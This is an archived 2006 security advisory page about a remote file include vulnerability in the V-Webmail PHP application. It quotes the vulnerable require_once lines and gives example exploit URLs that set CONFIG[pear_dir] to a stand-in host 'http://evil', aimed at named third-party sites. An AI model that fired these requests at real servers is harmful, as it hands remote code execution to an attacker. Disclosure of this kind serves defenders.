about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability




2006-05-25 V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability 
Rated as : Moderate Risk

Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with
an
abundance of features, including many innovative ideas for web
applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] .
'*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil
securitydot.net - 2006-05-25

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 00:00:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c mambo Remo news for c 200 /compo t55t news for c nude boys mambo Remo